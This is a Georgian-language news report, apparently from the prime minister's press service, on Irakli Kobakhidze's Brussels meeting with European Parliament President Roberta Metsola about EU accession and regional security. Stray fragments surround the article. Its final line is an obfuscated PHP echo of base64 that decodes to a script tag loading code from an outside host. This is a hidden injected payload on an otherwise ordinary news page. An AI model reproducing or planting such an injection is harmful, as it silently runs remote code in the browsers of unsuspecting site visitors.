celsiusi
ავერსი შნაიდერი

საქართველოს პრემიერ-მინისტრი ირაკლი კობახიძე ბრიუსელში შეხვედრებს განაგრძობს. მთავრობის მეთაური ევროპარლამენტის პრეზიდენტ რობერტა მეცოლას შეხვდა.

ევროპარლამენტის პრეზიდენტმა ირაკლი კობახიძეს პრემიერ-მინისტრის თანამდებობაზე დანიშვნა მიულოცა და წარმატებები უსურვა. თავის მხრივ, ირაკლი კობახიძემ რობერტა მეცოლას მხარდაჭერისთვის მადლობა გადაუხადა.

მხარეებმა ევროკავშირში გაწევრიანების გზაზე საქართველოს მიერ მიღწეული პროგრესი შეაჯამეს, ასევე მიმოიხილეს ევროკავშირში საქართველოს ინტეგრაციის უზრუნველსაყოფად განხორციელებული და მიმდინარე ღონისძიებები.

პრემიერ-მინისტრმა საქართველოსთვის კანდიდატის სტატუსის მინიჭების მნიშვნელობაზე ისაუბრა და აღნიშნა, რომ მისი ხელმძღვანელობით საქართველოს მთავრობა ქვეყნის ევროკავშირში გაწევრიანების პროცესში შემდგომი პროგრესის მისაღწევად მუშაობას აგრძელებს.

ირაკლი კობახიძემ ხაზი გაუსვა ევროკავშირში საქართველოს გაწევრიანების პროცესში ევროპარლამენტის როლსა და მისი მხარდაჭერის მნიშვნელობას. მხარეებმა საქართველოსა და ევროპარლამენტს შორის არსებული თანამშრომლობის დინამიკა შეაფასეს და პარტნიორობის გაძლიერების მზაობა გამოთქვეს.

შეხვედრაზე ირაკლი კობახიძემ და რობერტა მეცოლამ განიხილეს რეგიონსა და მსოფლიოში არსებული უსაფრთხოების გამოწვევები და მათი გადაჭრის გზებზე იმსჯელეს. აქცენტი გაკეთდა საქართველოს ოკუპირებულ რეგიონებში არსებულ ვითარებაზე.

ირაკლი კობახიძემ ევროპარლამენტის პრეზიდენტს საქართველოს ევროპული და ევროატლანტიკური მისწრაფებების, ასევე საქართველოს სუვერენიტეტისა და ტერიტორიული მთლიანობის ურყევი მხარდაჭერისთვის მადლობა გადაუხადა.

პრემიერ-მინისტრმა ევროპარლამენტის საპატიო სტუმართა წიგნში სამახსოვრო ჩანაწერი დატოვა.

ინფორმაციას საქართველოს პრემიერ-მინისტრის პრესსამსახური ავრცელებს.

210
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");